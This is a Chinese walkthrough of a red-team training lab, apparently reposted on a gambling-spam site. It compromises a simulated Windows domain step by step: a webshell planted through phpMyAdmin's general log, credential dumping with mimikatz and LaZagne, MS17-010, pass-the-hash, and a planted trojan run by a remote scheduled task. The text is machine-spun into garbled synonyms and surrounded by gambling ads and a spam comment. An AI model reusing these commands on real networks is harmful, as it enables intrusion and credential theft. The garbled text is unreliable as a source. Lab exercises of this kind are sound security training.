靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
攻击拓扑如下

0x01环境搭建
设置两卡,仅主机模式192.168.52.0网段模拟内网,192.168.72.0网段模拟外网
Kali linux IP 192.168.72.131
win7 IP 192.168.72.130/192.168.52.143
win2003 IP 192.168.72.141
DC 2008 IP 192.168.52.138

0X02信息网络
用nmap找到外网IP地址
netdiscover -i eth0 -r 192.168.72.0/24

御剑扫目录扫到后台
扫到目录http://192.168.72.130/phpmyadmin/
弱口令root /root进入后台

0x03phpmyadMin后台getshell
show variables like '%general%'; #查看日志状态

SET GLOBAL general_log='on'
约搏三公开船:ATT&CK红队评估实战靶场(一)  第1张
SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 设置路径
约搏三公开船:ATT&CK红队评估实战靶场(一)  第2张
SELECT ' ' //写入一句话木马
约搏三公开船:ATT&CK红队评估实战靶场(一)  第3张
getshell
http://192.168.72.130/233.php
约搏三公开船:ATT&CK红队评估实战靶场(一)  第4张

0x04权限提升
直接用Cs的剧本ms14-068提权
约搏三公开船:ATT&CK红队评估实战靶场(一)  第5张

0x05内网信息网络
把webshell转换成cs上线
约搏三公开船:ATT&CK红队评估实战靶场(一)  第6张
iPConfig /all
约搏三公开船:ATT&CK红队评估实战靶场(一)  第7张
hashdump看一下密码
约搏三公开船:ATT&CK红队评估实战靶场(一)  第8张
再用mimikatz抓一下明文密码,抓到hongrisec@2020
约搏三公开船:ATT&CK红队评估实战靶场(一)  第9张
shell net user /domain
查看域内用户
使用lodan扫描内网网络
约搏三公开船:ATT&CK红队评估实战靶场(一)  第10张
使用lazagone.exe 抓取本机所有密码
约搏三公开船:ATT&CK红队评估实战靶场(一)  第11张
抓到了许多win7机械上的密码
约搏三公开船:ATT&CK红队评估实战靶场(一)  第12张
用Msf的这个模块可以判断目的机械上面装了那些软件
run post/windows/gather/enum_applications 使用这个之后发现win7(双网卡机械)上有一个现成的nmap
直接用beacon下的nmap去扫描DC的破绽 shell nmap --script=vuln 192.168.52.138 发现域控存在ms17-010
约搏三公开船:ATT&CK红队评估实战靶场(一)  第13张
约搏三公开船:ATT&CK红队评估实战靶场(一)  第14张
这里实在已经可以直接去用Msf打域控的17010了

0x06MSF与CS联动
新启一个监听,用foriereverse_tcp,然后msf最先监听端口,乐成转接cs的shell
约搏三公开船:ATT&CK红队评估实战靶场(一)  第15张
查看当前网段并添加路由
约搏三公开船:ATT&CK红队评估实战靶场(一)  第16张

0x07设置msf署理
约搏三公开船:ATT&CK红队评估实战靶场(一)  第17张
之前扫描的是DC,先看一下2003有没有破绽,扫一下141,实在不挂署理也行,win7里面有一个Nmap,这里要注意socks署理不支持icmp协议
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141
约搏三公开船:ATT&CK红队评估实战靶场(一)  第18张

0x08两种拿下2003
由于已经知道了破绽,直接永恒之蓝打过去了
约搏三公开船:ATT&CK红队评估实战靶场(一)  第19张
PTH方式
选择之前天生的谁人smb beacon 然后在用哈希通报的方式,域内管理员的账号直接登录
约搏三公开船:ATT&CK红队评估实战靶场(一)  第20张
约搏三公开船:ATT&CK红队评估实战靶场(一)  第21张
192.168.52.141乐成上线
约搏三公开船:ATT&CK红队评估实战靶场(一)  第22张

0x09票据+计划任务拿DC
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141
约搏三公开船:ATT&CK红队评估实战靶场(一)  第23张
shell dir \192.168.52.138\c$ //dir DC的目录
约搏三公开船:ATT&CK红队评估实战靶场(一)  第24张
天生一个exe马
这里用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 天生正向的马 yukong.exe
把马复制到域控机械上shell copy C:\yukong.exe \192.168.52.138\c$
然后再用这个写入计划任务的方式去毗邻,这里马反弹会连不乐成,以是
shell schtasks /create /tn "test" /tr C:\yukong.exe /sc oNCe /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020"
挂着win7署理 proxy nc -vv 192.168.52.138 7777 即可弹回DC138的shell
用Meterpreter的马也可以,之前失败了,后续照样改成meterpreter的马,或者把通俗shell再升级成meterpreter再导入cs也可以
马上线之后消灭计划任务schtasks /delete /s 192.168.52.138 /tn "test" /f

本靶场有许多地方都可以打乐成,可以自己实验一下。

,

Allbet Gaming

www.xzqdaohang.com欢迎进入欧博平台网站(Allbet Gaming),Allbet Gaming开放欧博平台网址、欧博注册、欧博APP下载、欧博客户端下载、欧博真人游戏(百家乐)等业务。

发布评论

分享到:

郑州百姓网:Oppo 也出了款「Apple Watch」
1 条回复
  1. 欧博allbet注册
    欧博allbet注册
    (2020-10-12 00:05:38) 1#

    www.allbetgaming.net欢迎进入欧博平台网站(www.aLLbetgame.us),www.aLLbetgame.us开放欧博平台网址、欧博注册、欧博APP下载、欧博客户端下载、欧博游戏等业务。这个故事线比较完整

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。